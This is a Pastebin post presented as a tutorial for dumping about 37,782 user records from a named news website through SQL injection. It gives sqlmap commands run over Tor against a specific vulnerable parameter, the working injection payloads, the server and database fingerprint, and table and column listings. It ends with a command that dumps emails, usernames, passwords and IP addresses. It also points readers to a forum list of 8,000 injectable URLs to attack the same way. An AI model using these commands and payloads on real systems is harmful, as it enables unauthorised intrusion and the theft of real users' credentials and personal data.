Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Tutorial: Dump (37,782) user records (email,username,plaintext-password) from (www.maliweb.net)
- Use this technique with these 8,000 SQLi checked URLs
- https://raidforums.com/Thread-8-128-SQLi-Tested-Urls-w-DBMS-Sorted-by-Alexa-Traffic-Rank
- https://www.maliweb.net/category.php?NID=85465'
- dbms: MySQL, alexaRank: 24,014
- title: undefined
- Get the database list and find the current database:
- sqlmap --tor --tor-type=SOCKS5 -u 'https://www.maliweb.net/category.php?NID=85465' -p NID --dbs --current-db --threads=10
- Parameter: NID (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: NID=85465' AND 9631=9631 AND 'kmhp'='kmhp
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- Payload: NID=85465' AND (SELECT 4899 FROM(SELECT COUNT(*),CONCAT(0x7170767a71,(SELECT (ELT(4899=4899,1))),0x7170787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vubb'='vubb
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: NID=85465' AND SLEEP(10) AND 'APjc'='APjc
- web server operating system: Linux CentOS 6.8
- web application technology: PHP 5.4.45, Apache 2.2.15
- back-end DBMS: MySQL >= 5.0
- current database: 'maliweb_news'
- available databases [2]:
- [*] information_schema
- [*] maliweb_news
- sqlmap --tor --tor-type=SOCKS5 -u 'https://www.maliweb.net/category.php?NID=85465' -p NID -D maliweb_news --tables --count --threads=10
- Database: maliweb_news
- +---------------------------+---------+
- | Table | Entries |
- +---------------------------+---------+
- | comments | 378229 |
- | mali_tb_quotes | 183736 |
- | mali_tb_news | 72698 |
- | mali_tb_registration | 37782 |
- | mali_tb_forumcomments | 3956 |
- | mali_tb_vedio_comments | 1720 |
- | media_ortmvideo | 1324 |
- | mali_tb_rating | 953 |
- | poll_data | 293 |
- | mali_tb_category | 177 |
- +---------------------------+---------+
- Get columns for table "mali_tb_registration"
- sqlmap --tor --tor-type=SOCKS5 -u 'https://www.maliweb.net/category.php?NID=85465' -p NID -D maliweb_news -T mali_tb_registration --columns --threads=10
- Database: maliweb_news
- Table: mali_tb_registration
- [12 columns]
- +------------------+--------------+
- | Column | Type |
- +------------------+--------------+
- | active_status | char(1) |
- | avtar_img_status | varchar(1) |
- | avtarimg | varchar(250) |
- | block_status | char(1) |
- | email | varchar(100) |
- | id | int(11) |
- | ipaddress | varchar(100) |
- | name | varchar(100) |
- | password | varchar(100) |
- | postdate | date |
- | security_code | varchar(150) |
- | username | varchar(100) |
- +------------------+--------------+
- Dump 37,782 rows from "mali_tb_registration"
- sqlmap --tor --tor-type=SOCKS5 -u 'https://www.maliweb.net/category.php?NID=85465' -p NID -D maliweb_news -T mali_tb_registration -C email,username,password,name,ipaddress --dump --threads=10
Add Comment
Please, Sign In to add comment